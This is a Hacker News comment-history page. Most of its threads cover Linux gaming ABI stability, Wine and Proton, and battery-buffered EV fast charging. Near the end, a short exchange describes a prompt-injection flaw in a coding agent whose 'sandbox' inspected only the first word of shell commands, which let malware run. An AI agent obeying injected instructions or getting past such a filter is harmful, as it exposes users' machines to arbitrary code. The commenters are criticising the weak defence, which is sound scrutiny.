Hacker Newsnew | past | comments | ask | show | jobs | submit | orbital-decay's commentslogin

Somehow I'm not surprised that Zero's software is terrible. I don't think being new has anything to do with it, they are just that type of company.

AI unreliability aside, Microsoft suing the hell out of them was always a concern. They do clean room reimplementation to insulate themselves from legal risks as much as possible, another incentive is not what anyone wants.

Well about clean room, you almost got a haircut due to Google v. Oracle in the Android-Java API dispute

Unlikely. Games need a stable ABI and Win32 is the only stable ABI on Linux.

Proprietary software needs a stable ABI. Not games.

DOOM runs on any Linux system since forever because we had access to the source. You can build it for Linux 2.6 and it’ll probably still work today.

Sadly most games are proprietary


Even if all games were FOSS, without - at least - a stable API, most games will remain a hassle to run. DOOM doesn't deal as much with this due to the high amount of volunteers, but relying on community support for all games is just outsourcing labor to some unlucky fellows. At best, it's yet another pain for Linux users. At worse, it's the death of unpopular games. Either case, a hurdle for Linux adoption.

Not really. I actually tried building an "old" game (read: not updated since 2014 or so) on Linux when I used it. It didn't work because autotools changed, some weird errors with make, and the library APIs have changed too.

In the end I gave up and just used proton on the windows .exe. Unbelievable. :(


I should clarify my original comment about stability only applies to glibc itself. Once we go out of glibc there will be varying degrees of API/ABI stability simply because at that point it’s just different groups of people doing the work

In some cases such libraries are also cross-platform so the same issues would be found on Windows (eg: try to build application which depends on openssl3 with openssl4 and it will not work on either Linux or windows)

For future reference if you ever need to do that again, it would be way easier to spin up a container with the build environment the software expects. Track down the last release date of the software and do podman run —-rm -it ubuntu:$from_that_time and just build the software as usual.

You can typically link the dependencies statically during build time to create system independent binaries. So the binary produced inside the container would work on your host as well.


That sounds almost as easy as just copying an .exe file from Windows and running it.

/s


> Proprietary software needs a stable ABI.

Open source software also needs a stable ABI because:

a) i don't want to bother building it over and over (not everything is in my distro's repository, a ton of software has a stupid building process and not every new version is always better than the old versions)

b) a stable ABI implies a stable API and even if you have the source, it is a massive PITA to have to fix whatever stuff the program's dependencies broke to get it running, especially if you're not the developer who made it in the first place

c) as an extension to "b", a stable API also means more widely spread information/knowledge about it (people wont have to waste time learning how to do the same tasks in a slightly different way using a different API), thus much easier for people to contribute to software that use that API


People who keep parroting this clearly have no experience of gaming on linux.

I am playing both modern and old games on Linux. Games outside a super narrow enthusiast realm are always closed-source (even indie ones) and it's going to stay like that in the foreseeable future, that's just a fact of life and gamedev incentives and specifics.

Please elaborate.

Wine has constant regressions. What works fine today will completely fail next year. Which is why steam lets you pick which proton version you want to use.

Which means that a .exe without the exact version of wine won't run.

Plus of course there's the whole vulkan stuff. Older cards aren't well supported but it will rather crash than just run openGL normally where it would work fine.


Those issues seem othorgonal to stable ABI issue from OP, specially the OpenGL one (that is more like a hardware incompatibility issue). When apps fail to run due to Wine updates, they are considered bugs to be fixed. On the native side, apps may break becuase: 1) required library is unavailable, normally because it is too old and unsupported; 2) required library's path is different in distro A from B. None of these are considered bugs and, as such, are rarely addressed. I believe Steam Linux Runtime is an attempt at fixing this,but I'm not sure about its effectiveness. Also, you are exaggerating on the "exact Wine version". It helps to know which versions don't have a regression by knowing which specific version an app used to run on.

> I believe Steam Linux Runtime is an attempt at fixing this,but I'm not sure about its effectiveness.

It's effective enough for it to be practically a solved problem now.


In practice, Wine is constantly improving. It's in active development and not that stable, but regressions are mostly local. Treat its releases like bleeding edge.

>What works fine today will completely fail next year.

Usually not on the timescale of a year. I have many new games that worked a year ago and none of these stopped working now. The worst breakage I had recently was some physics glitches in an old RPG (released in 2001) on Wine 11.0, and it was fixed in the next release.


Are you able to run any of the old Loki games on Linux these days?

With compat libraries and OSSPD it will run even under Pulseaudio.

There's nothing recent about the most popular media being manipulated and/or biased. Discussions on this forum date back two decades, however the specific narrative depends on the context.

Same as always I guess? Good cop, bad cop. They seem to go through this cycle every decade or so.

Are they trying to reinvent Cyc?

https://en.wikipedia.org/wiki/Cyc


Yes. That's why I'm using NixOS as well, despite all the terrible jank it has.

Automating my homelab config with coding machines not only hides the jank, but also makes NixOS feel like some actual agentic OS Microsoft wants, or rather an ad-hoc prototype. I literally just tell it what to do and describe issues if I have any. But again I have written a ton of Nix previously and I'm able to verify what it does, most of the time it's correct but it's not perfect.


>Just taking an existing fast charger with 150- or 350-kW capacity and swapping in the latest and greatest 1,500-kW chargers wouldn’t get anyone faster speeds. The system would need all new “pipes”—grid capacity—to actually move that much current.

The grid doesn't necessarily mean "pipes" or power lines. You don't build a pipeline to every gas station. Mobile charging robots work pretty well in China.


Also I guess they could put a large battery at the charging station so it can take say a steady 200kw from the grid and be able to kick out 1500kw for ten minutes occasionally. That could also charge from cheap off peak electricity.

> guess they could put a large battery at the charging station

BYD's megawatt charging does exactly that.

Tbe best part, the "large battery" uses the same battary on BYD cars. The same electric components, cooling system, etc.


Exactly what Tesla's megapack superchargers do

This is what everyone is already doing, even for relatively small and slow dispensers.

It's simply cheaper to have on-site batteries. It makes installation work with a smaller connection to the grid, and makes it possible to install chargers in more places without upgrading the grid connection.

Energy arbitrage is profitable on its own, so EV charging stations are almost just an excuse to get some land and a grid connection for more batteries.


Traffic congestion costs for electricity is going to get wild if we start stacking all sorts of random >= 1.5 MW demands scattered everywhere.

Imagine if we had a parallel information network that could coordinate the charging times of all these things in real-time.

Fair bit of overhead to pull that off, but interesting.

Not really, all you'd need to do is make a live price ticket that's dependent on congestion and make that available over the network, and economics takes care of the rest.

This is what they already are doing, the article is behind a paywall so no clue if they say it there but you can for example see this article about it: https://www.etechvolution.com/p/byd-megawatt-flash-charging-...

Supercaps are viable for this sort of short term charge and discharge. The much maligned donut labs is suspected to be a license built Nordic hybrid supercap battery model

Exactly what Tesla's megapack superchargers do

They removed VPNs at the request of the Russian government too (they have no operations in Russia). They are actively participating in government censorship.

>Snowflake Cortex AI Escapes Sandbox and Executes Malware

rolls eyes Actual content: prompt injection vulnerability discovered in a coding agent


Well there's the prompt injection itself, and the fact that the agent framework tried to defend against it with a "sandbox" that technically existed but was ludicrously inadequate.

I don't know how anyone with a modicum of Unix experience would think that examining the only first word of a shell command would be enough to tell you whether it can lead to arbitrary code execution.


Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: